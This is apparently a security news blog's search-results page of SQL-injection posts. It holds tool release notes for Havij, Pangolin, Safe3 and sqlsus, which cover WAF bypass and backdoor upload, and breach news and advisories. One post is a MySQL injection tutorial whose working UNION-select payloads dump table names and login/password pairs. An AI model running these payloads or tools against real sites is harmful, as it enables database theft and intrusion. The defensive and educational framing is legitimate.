Showing posts sorted by relevance for query SQL Injection. Sort by date Show all posts
Showing posts sorted by relevance for query SQL Injection. Sort by date Show all posts

SQL Injection Vulnerability In Google Lab Database System found by Shadman Tanjim

Posted by Avik Sarkar On 6/30/2011 10:03:00 pm


SQL Injection Vulnerability In Google Lab Database System found by Shadman Tanjim (Admin Bangladesh Cyber Army). Here is the report Submitted By Shadman to VOGH. 

REPORT:-

Very Big and Critical Vulnerability detect in Google Lab System. Vendor is already reported. But they don’t take positive step in this case this vulnerability is now exposed and open in public. Now I tell details About the Vulnerability in Google Lab System.
Google Lab Website has SQL Injection Vulnerability and Dangerous thing is this
Vulnerability is Exploitable. We can get Tables, columns and data. Google Lab
Database has his own customize DB system. But Interesting things is their database system is Similar as Ms Access database. In this case Ms Access SQL Injection System is Also Work on Google Lab Database system. And this vulnerability is 100% real and Now We can see this in our eyes. 

Now I give you Step by step proof about this Vulnerability.


2. Vulnerability type: SQL Injection

Info:
6. Host IP: 209.85.175.141
7. Web Server: Google Frontend
8. Keyword Found: Fast
9. Injection type is Integer
10. Keyword corrected: Swirl

Let’s Check Exploiting this Vulnerable link. Here I use 3 Famous SQL Injection
tools. They are:
1. Havij Advance SQL Injection Tool
2. Safe3 SQL Injector v8.4
3. Pangolin SQL Injection Tool

You Can Download the Video Of This Vulnerability VIDEO LINK
To Download the Full PDF report Click HERE

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

SQLol -SQL-i Vulnerability Testing Framework

Posted by Avik Sarkar On 1/10/2012 06:49:00 pm


In the Austin Hackers Association meeting they released SQLol. SQLolis a configurable SQL injection testbed. It allows you to exploit SQL injection flaws, but furthermore allows a large amount of control over the manifestation of the flaw. The author thought about different data extraction techniques from SQL injection flaws and found that a vulnerability framework that includes SQLi verbose error extraction techniques was never found. To be precise, the author never came across a vulnerability framework that includes SQL injection in a DELETE query. So, with this aim in mind, SQLol was born, specifically for SQL injection flaws. It can be useful to those who know nothing about SQL injection, or those who know a bit of it. SQLol comes with a set of challenges which help you with performing some flavor of SQL injection and have pre-configured settings.

Options:-
  • Type of query
  • Location within query
  • Type and level of sanitization
  • Level of query output
  • Verbosity of error messages
  • Visibility of query
  • Injection string entry point


Other Cool Things:-
  • Reset button
  • Challenges
  • Support for multiple database systems


Requirements:-
  • PHP 5.x
  • Web server
  • Database server (MySQL, PostgreSQL and SQLite have been tested, others may work)
  • ADODB library (included)

To Download SQLol Click Here




SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

10K+ Websites Infected In Ongoing Mass SQL Injection Attack

Posted by Avik Sarkar On 4/03/2012 01:54:00 pm

10K+ Websites Infected In Ongoing Mass SQL Injection Attack
Security experts of Webroot has confirmed that another mass SQL-Injection attack is currently underway. According to the blog post of Webroot "Hundreds of thousands of legitimate web sites are currently affected in a a mass SQL injection attack that has been ongoing for the past several months. The ongoing mass SQL injection attacks, are directly related to last year’s scareware-serving Lizamoon mass SQL injection attacks. The cyber criminals behind it, are automatically exploiting the legitimate web sites, and embedding a tiny script on the affected pages, abusing an input validation flaw, or exploiting vulnerable and outdated versions of the web application software running on them."
The campaign is currently consisting of 5 SQL injected domains parked on a single IP hosted within the Russian Federation. Parked at 91.226.78.148 (AS56697, LISIK-AS OOO “Byuro Remontov “FAST”) are the following domains participating in the mass SQL injection attack:
hjfghj.com/r.php – According to Google, 323,000 sites are affected
fgthyj.com/r.php – According to Google, 390,000 sites are affected
gbfhju.com/r.php – According to Google, 74,200 sites are affected
statsmy.com/ur.php – According to Google, 3,080,000 sites are affected
stmyst.com/ur.php – According to Google, 1,320,000 sites are affected

All of these domains have been registered by the same cybercriminal/gang, using identical WHOIS records:
JamesNorthone
James Northone jamesnorthone@hotmailbox.com
+1.5168222749 fax: +1.5168222749
128 Lynn Court
Plainview NY 11803
US

Thankfully, all of these domains are currently returning a “404 Not Found” error message, with the cybercriminals behind the campaign, attempting to cover their tracks. Earlier in 2011 we have also seen such scenario when 614,000 webpages comromised with mass ASP.NET Infection, also Willysy malware Infects More than 6 Million WebSitesLilupophilupop Attack took 1 Million+ Web-pages and so on. Even in last month we have seen more than 200,000 websites get compromised with fake anti-virus exploit. There is no ready made solution for such attacks or vulnerabilities because we all know that "Security is an Illusion", but still the site Admin & webmasters should became more conscious and try to avoid silly programming mistakes, should keep their systems up-to-date and use antivirus software. 



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Safe3 SQL-Injector v.8.1 is now Available

Posted by Avik Sarkar On 5/18/2011 12:53:00 am



Safe3 is one of the most powerful and easy usage penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a kick-ass detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connection.

New Features and bug fix:
  • Full support for http, https website.
  • Full support for Basic, Digest, NTLM http authentications.
  • Full support for GET, Post, Cookie sql injection.
  • Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, ybase and SAP MaxDB database management systems.
    Full support for four SQL injection techniques: blind, error-based, UNION query and force guess.
  • Powerful AI engine to automatic recognite injection type, database type, sql injection best way.
  • Support to enumerate databases, tables, columns and data.
  • Support to read,list and write any file from the database server underlying file system when the database oftware is MySQL or Microsoft SQL Server.
  • Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is Oracle or Microsoft SQL Server.
  • Support to ip domain query,web path guess,md5 crack etc.
  • Support for sql injection scan.
Download Safe3 Sql Injector v.8.1 here


SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Havij v1.16 Advanced & Automated SQL Injection Tool Released

Posted by Avik Sarkar On 6/21/2012 12:21:00 am

Havij v1.16 Advanced & Automated SQL Injection Tool Released
One of the most preferred and widely used SQL-injector Havij has released another updated version (v1.16). In the middle of last year ITSec team made Havij 1.15 available, so after one year of hard work now we got the next edition of this marvellous SQL-i tool. As per survey Havij is listed as one of the finest and widely used tool used for finding SQL Injection vulnerabilities on a web page. It has been thoroughly used by hackers along with penetration testers over the whole spectrum. 

Brief About Havij :- It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and  password hashes, dump tables and columns, fetching data from the database, running SQL  statements and even accessing the underlying file system and executing commands on the  operating system. The power of Havij that makes it different from similar tools is its injection methods. The success rate is more than 95% at injectiong vulnerable targets using Havij. The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users.

New Features :-
  • Multithreading
  • Oracle Blind injection method.
  • Automatic all parameter scan added.
  • New blind injection method (no more ? char.)
  • Retry for blind injection.
  • A new method for tables/columns extraction in mssql blind.
  • A WAF bypass method for mysql blind.
  • Getting tables and columns even when can not get current database.
  • Auto save log.
Bug Fixed:- 
  • url encode bug fixed.
  • Trying time based methods when mssql error based and union based fail.
  • Clicking get columns would delete all tables.
  • Reseting time based method delay when applying settings.
  • Oracle and PostgreSQL detection

For additional information & to Download Havij v1.16 Click Here 
 


SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

We Are The Best Tool For Web Application Security (Discovering Infamous Sql-i Technique)

Posted by Avik Sarkar On 12/02/2013 01:00:00 am

We Are The Best Tool For Web Application Security (Discovering The Infamous Sql-injection Technique) 

Today I am proudly sharing an article made by Mr. Rafael Souza one of the great admirer and fan of VOGH has gladly shared his brilliant research paper on SQL-Injection (MySql) with us. Rafael is a very passionate on cyber security domain and he is keenly involved with GreyHat Community and Maintainer design of Brazilian Backtrack Team. So without wasting time lets go and see what Rafael has for us:- 

Discover The Infamous MySQL Injection Technique 
                                                                                        
ABSTRACT:
It is known that computers and software are developed and designed by humans, human error is a reflection of a mental response to a particular activity. Did you know that numerous inventions and discoveries are due to misconceptions?
There are levels of human performance based on the behavior of mental response , explaining in a more comprehensive, we humans tend to err , and due to this reason we are the largest tool to find these errors , even pos software for analysis and farredura vulnerabilities were unimproved by us.
                                                                                                       
Understand the technique MySQL Injection: 
One of the best known techniques of fraud by web developers is the SQL Injection. It is the manipulation of a SQL statement using the variables who make up the parameters received by a server-side script, is a type of security threat that takes advantage of flaws in systems that interact with databases via SQL. SQL injection occurs when the attacker can insert a series of SQL statements within a query (query) by manipulating the input data for an application. 

STEP BY STEP
 
(Figure 1) Detecting
Searching Column number (s): We will test earlier in error, then no error may be said to find.
(Figure 2) SQL Error 
Host Information,
Version of MySQL system used on the server.
(Figure 3) Host Information
(Figure 4) Location of the Files
Current database connection used between the "input" to the MySQL system
(Figure 5) Users of MySQL
(Figure 6) Current Time
Brute Force or Shooting
This happens in versions below 5.x.y
(Figure 7) Testing

Dump: This happens in versions up 5.x.y [ 1º Method ]
http://[site]/query.php?string= 1 union all select 1,2,3,4,group_concat(table_name) from information_schema.tables where table_schema=database()--
usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you
or
Unknown column 'usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you' at line 1

<>------------------------<>-------------------------<>--------------------------<>

[ 2º Method ]

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 0,1--
CHARACTER_SETS
or
Unknown column 'CHARACTER_SETS' in 'where clause'
ou
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'CHARACTER_SETS' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 1,2--
COLLATIONS
or
Unknown column 'COLLATIONS' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'COLLATIONS' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 16,17--
usuarios
or
Unknown column 'usuarios' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'usuarios' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 17,18--
rafael
or
Unknown column 'rafael' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael' at line 1
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Searching Column (s) of a given table
* Brute Force / Shooting
This happens in versions below 5.x.y
http://[site]/query.php?string= 1 union all select 1,2,3,4,nome from usuarios--
Unknown column 'rafael1' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael1' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,churros from usuarios--
Unknown column 'rafael1' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael1' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,login from usuarios--
_Rafa_
or
Unknown column '_Rafa_' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Rafa_' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,passwd from usuarios--
rafael1337
or
Unknown column 'rafael1337' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael1337' at line 1

=--------------------------=--------------------------=--------------------------=--------------------------=
Dump
This happens in versions up 5.x.y [ 1º Method ]

"usuarios" hexadecimal -> "7573756172696f73"

http://[site]/query.php?string= 1 union all select 1,2,3,4,group_concat(column_name) from information_schema.columns where table_name=0x7573756172696f73--
login,passwd,id,texto
or
Unknown column 'login,passwd,id,texto' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'login,passwd,id,texto' at line 1

<>------------------------<>-------------------------<>--------------------------<>

[ 2º Method ]

"usuarios" decimal -> "117,115,117,97,114,105,111,115"

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 0,1--
login
or
Unknown column 'login' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'login' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 1,2--
passwd
or
Unknown column 'passwd' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'passwd' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 2,3--
id
or
Unknown column 'id' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'id' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 3,4--
texto
or
Unknown column 'text' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'text' at line 1
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Extracting data from the columns of a given table
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(login,0x20,0x3a,0x20,senha) from usuarios--
_Rafa_ : fontes1337
or
Unknown column '_Rafa_ : fontes1337' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Rafa_ : fontes1337' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,group_concat(login,0x20,0x3a,0x20,senha) from usuarios--
_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec
or
Unknown column '_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec ‘in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat_ws(0x20,0x3a,0x20,login,senha) from usuarios--
_RHA_ : infosec1337
or
Unknown column '_RHA_ : infosec1337‘ in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Mlk_ : gremio1903' at line 1

=--------------------------=
Concat
group_concat() => Search all you want with ascii caracters
concat() => search what you want with ascii caracters
concat_ws() => unite

Hexadecimal
0x3a => :
0x20 => space
0x2d => -
0x2b => +

Readers, this article is for educational purposes only, could continue explaining how to exploit web sites, but that is not my intention.
It is known that the impact of the change may provide unauthorized access to a restricted area, being imperceptible to the eye of an inexperienced developer, it may also allow the deletion of a table, compromising the entire application, among other features. So I want to emphasize that this paper is for security researcher and developers to beware and test your code.

CONCLUSION
Many companies are providing important information on its website and database, information is the most valuable asset is intangible, the question is how developers are dealing with this huge responsibility?
The challenge is to develop increasingly innovative sites, coupled with mechanisms that will provide security to users.
The purpose of this paper is to present what is SQL Injection, how applications are explored and techniques for testing by allowing the developer to customize a system more robust and understand the vulnerability.
**********
I hope you all will enjoy the above article, as I did. On behalf of entire VOGH Team I am sincerely thanking Mr. Rafael Souza for his remarkable contribution. 
To get more of such exclusive research papers along with all kind of breaking cyber updates across the globe just stay tuned with VOGH


SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Pangolin 3.2.5 Released (SQL-i Testing Tool)

Posted by Avik Sarkar On 9/17/2011 02:37:00 pm


Pangolin is a penetration testing, SQL Injection test tool on database security. It finds SQL Injection vulnerabitlities.Its goal is to detect and take advantage of SQL injection vulnerabilities on web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user"s specific DBMS tables/columns, run his own SQL statement, read specific files on the file system and more.
Supported Database:-
Access,DB2,Informix,Microsoft SQL Server 2000,Microsoft SQL Server 2005,Microsoft SQL Server 2008,MySQL,Oracle,PostgreSQL,Sqlite3,Sybase.
Features:-
  • HTTPS support
  • Pre-Login
  • Proxy
  • Specify any HTTP headers(User-agent, Cookie, Referer and so on)
  • Bypass firewall setting
  • Auto-analyzing keyword
  • Detailed check options
  • Injection-points management
  • Injection Digger
  • Data dumper
New Features of Pangolin 3.2.5:-
  • Auto analyzing keywords before injecte with cookie.
  • Support manually select keywords.
  • Release "oracle_data.php" to customize "Remote Data URL" when injecte Oracle.
To download Pangolin Click Here 


SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Hackers use blind SQL injection attack to crack Oracle-Sun, MySQL.com

Posted by Avik Sarkar On 4/25/2011 12:33:00 am

The hackers used a blind SQL injection attack to hack into the website and disclosed details of the breach on The Full Disclosure Mailing List. The two hackers said they breached various databases discovering the password hashes for various usernames associated with the website.
Oracle Corp., which acquired Sun Microsystems in 2009 and included the newly acquired MySQL database division, has not acknowledged the breach. Website vulnerabilities that can be used in a SQL injection attack are common on websites. The vulnerabilities enable attackers to perform a database query to request some action to be performed on a database. If the database returns an error, savvy hackers can use the information to gain wider access to the server containing the underlying website data.
In the data shared by the hackers, some of the password hashes were cracked to reveal complete login details for accounts associated with mySQL.com, including the WordPress account login details for Robin Schumacher, the former director of product management, and Kaj Arnö, former vice president of community relations.
Some of the passwords revealed simple phrases. Schumacher set his password as a simple 4-digit number—with three repeating digits. The hackers also posted several other database tables without the password hashes.
Information relating to Sun.com was also posted. The data consists of a series of columns, tables and databases derived from an SQL injection into Sun's websites. This dump is seemingly devoid of passwords, but it does reveal several company email addresses.
While embarrassing, the flaw is not in the MySQL database management system software, but rather is a website coding vulnerability, said Chester Wisniewski, a senior security advisor, writing in the Sophos blog, Naked Security. Wisniewski said the MySQL website is also subject to ancross-site scripting (XSS) vulnerability that was announced in January 2011 and has yet to be remedied. "Auditing your websites for SQL injection is an essential practice, as well as using secure passwords," Wisniewski wrote. "Either can lead you down a road that ends in tears."

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Pangolin v3.2.3! The Automatic SQL Injection Penetration Testing Tool

Posted by Avik Sarkar On 4/25/2011 12:24:00 am

 
Pangolin is a penetration testing, SQL Injection test tool on database security. It finds SQL Injection vulnerabitlities.Its goal is to detect and take advantage of SQL injection vulnerabilities on web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user”s specific DBMS tables/columns, run his own SQL statement, read specific files on the file system and more.
Supported databases:
Oracle
MS SQL Server 2000
MS SQL Server 2005
Sybase
Access
Mysql
DB2
Informix
Pangolin most of us know it works like a charm specially if you have the commercial version. Freeversion has limited features but more than enough to test your database for known vulnerabilites.
Operating Systems supported:
Windows Xp SP2 and above (not tested with 64 bit and seven)
Download Pangolin here

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

sqlsus v0.7 (SQL Injection and Takeover Tool)

Posted by Avik Sarkar On 11/04/2011 09:27:00 pm


sqlsus is an open source MySQL injection and takeover tool, written in perl. Via a command line interface, you can retrieve the database(s) structure, inject your own SQL queries (even complex ones), download files from the web server, crawl the website for writable directories, upload and control a backdoor, clone the databases, and much more. sqlsus is an open source (My)SQL injection tool, written in perl. It focuses on speed and efficiency, optimising the available injection space. It provides an easy to use interface with lots of neat features.

Features of Sqlsus v0.7:-
  • Added time-based blind injection support (added option “blind_sleep”, and renamed “string_to_match” to “blind_string”).
  • It is now possible to force sqlsus to exit when it’s hanging (i.e.: retrieving data), by hitting Ctrl-C more than twice.
  • Rewrite of “autoconf max_sendable”, so that sqlsus will properly detect which length restriction applies (WEB server / layer underneath). (removed option “max_sendable”, added options “max_url_length” and “max_inj_length”)
  • Uploading a file now sends it into chunks under the length restriction.
  • sqlsus now saves variables after each command, so that forcing it to quit (or killing it) will not discard the changes that were made.
  • Added a progress bar to inband mode, sqlsus now determines the number of rows to be returned prior to fetching them.
  • get db (tables/columns) in inband mode now uses multithreading (like everything else).
  • clone now uses count(*) if available (set by “get count” / “get db”), instead of using fetch-ahead.
  • In blind mode, “start” will now test if things work the way they should, by injecting 2 queries : one true and one false.
  • sqlsus now prints what configuration options are overridden (when a saved value differs from the configuration file).
To Download sqlsus (My SQL Injection Tool) 

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Multiple Vulnerability Found in vTiger CRM 5.2.x

Posted by Avik Sarkar On 10/07/2011 05:04:00 pm


Multiple vulnerability found on vTiger CRM 5.2.x. vTiger CRM is vulnerable to Blind SQL Injection, Remote Code Execution, Multiple Cross Site Scripting
OVERVIEW:-
The vTiger CRM 5.2.1 and lower versions are vulnerable to Blind SQL Injection. No fixed version has been released as of 2011-10-05.

BACKGROUND:-
vtiger CRM is a free, full-featured, 100% Open Source CRM software ideal for small and medium businesses, with low-cost product support available to production users that need reliable support. vtiger CRM is a widely used product with thousands of users in dozens of countries.  It has a vibrant community of users driving the product forward, and contributing to it's development.  Over 2 million copies of vtiger CRM have been downloaded so far. It was launched as a fork of version 1.0 of the SugarCRM project launched on December 31st, 2004.

VULNERABILITY DESCRIPTION:-
  • Blind SQL Injection:-
The "onlyforuser" parameter was not properly sanitized, which allows attacker to conduct Blind SQL Injection Attack. This could an attacker to inject or manipulate SQL queries in the back-end database, allowing for the manipulation or disclosure of arbitrary data.

  • Remote Code Execution:-
vTiger uses the vulnerable version of phpmailer class file located at /cron/class.phpmailer.php

  • XSS:-
Multiple parameters were not properly sanitized, which allows attacker to conduct Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser.

VERSIONS AFFECTED:-
Tested on 5.2.1


-News Source (YGN, Security Focus)


SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Keep Your Database Free from SQL Injection Attacks

Posted by Avik Sarkar On 4/25/2011 11:21:00 pm

SQL injection attacks have become a hot topic again, following Computerworld's report that Oracle.comsuffered such an attack this week. This kind of attack, one of the most well-known and dangerous but least understood, was used to breach the security of Oracle's customer website, exposing usernames and, in some cases, passwords.

To protect your databases, check out our excerpt from Justin Clarke's "SQL Injection Attacks and Defense." The excerpt explains in detail exactly what an SQL injection is and how it works so you can take appropriate steps to minimize vulnerability.

You should also take a look on our password creation and management resources, since these "stolen passwords" lists often expose users' lackadaisical attitudes towards creating hard-to-break passwords. These sample policies and policy templates can make sure that weak passwords don't compromise data security:

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Famous SQL-i tool Havij v1.15 is now Available

Posted by Avik Sarkar On 6/24/2011 01:17:00 am


Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page. It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and  password hashes, dump tables and columns, fetching data from the database, running SQL  statements and even accessing the underlying file system and executing commands on the operating system.


The New features of Havij 1.15 :-

Webknight WAF bypass added.
Bypassing mod_security made better
Unicode support added
A new method for tables/columns extraction in mssql
Continuing previous tables/columns extraction made available
Custom replacement added to the settings
Default injection value added to the settings (when using %Inject_Here%)
Table and column prefix added for blind injections
Custom table and column list added.
Custom time out added.
A new md5 cracker site added
Bugfix: a bug releating to SELECT command
Bugfix: finding string column
Bugfix: getting multi column data in mssql
Bugfix: finding mysql column count
Bugfix: wrong syntax in injection string type in MsAccess
Bugfix: false positive results was removed
Bugfix: data extraction in url-encoded pages
Bugfix: loading saved projects
Bugfix: some errors in data extraction in mssql fixed.
Bugfix: a bug in MsAccess when guessing tables and columns
Bugfix: a bug when using proxy
Bugfix: enabling remote desktop bug in windows server 2008 (thanks to pegasus315)
Bugfix: false positive in finding columns count
Bugfix: when mssql error based method failed
Bugfix: a bug in saving data
Bugfix: Oracle and PostgreSQL detection

To Download Havij 1.15 Click HERE

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

SQL Injection Vulnerability Affected All Versions of Ruby on Rails

Posted by Avik Sarkar On 1/07/2013 06:19:00 pm

SQL Injection Vulnerability Affected All Versions of Ruby on Rails (CVE-2012-5664)

Developers at Ruby on Rails are warning its users regarding a Sql Injection flaws which has affected all the current version of Ruby on Rails web framework. While exploiting the vulnerability an attacker can inject and even execute malicious codes into the web application. "Due to the way dynamic finders in Active Record extract options from method parameters, a method parameter can mistakenly be used as a scope. Carefully crafted requests can use the scope to inject arbitrary SQL," explained the Rails framework's developers. As soon as this vulnerability has been spotted in the wild, the maintainers of Ruby on Rails have released new versions that addresses the flaw, versions 3.2.10, 3.1.9 and 3.0.18. In their advisory Ruby on Rails team recommends that users running affected versions, which is essentially anyone using Ruby on Rails, upgrade immediately to one of the fixed versions mentioned earlier. "We're sorry to drop a release like this so close to the holidays but regrettably the exploit has already been publicly disclosed and we don't feel we can delay the release," Rails developer concluded. 

The original problem was disclosed on the Phenoelit blog in late December where the author applied the technique to extract user credentials from a Ruby on Rails system, circumventing the authlogic authentication framework. While talking about the vulnerability discloser of Ruby on Rails, we would like to remind you that, this is not the first time, earlier in 2012 a Russian security researcher named Homakov has found that Github has succumbed to a public key vulnerability in Ruby on Rails which is allowing a normal user to gain administrator access into the popular Rails Git.

Brief About Ruby on Rails:- Ruby on Rails, often shortened to Rails, is an open source full-stack web application framework for the Ruby programming language. Ruby on Rails runs on the general-purpose programming language Ruby, which predates it by more than a decade. Rails is a full-stack framework, meaning that it gives the web developer the ability to gather information from the web server, talk to or query the database, and render templates out of the box. As a result, Rails features a routing system that is independent of the web server. Ruby on Rails emphasizes the use of well-known software engineering patterns and principles, such as Active record pattern, Convention over Configuration, Don't Repeat Yourself and Model-View-Controller.





SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Related Posts Plugin for WordPress, Blogger...

Site search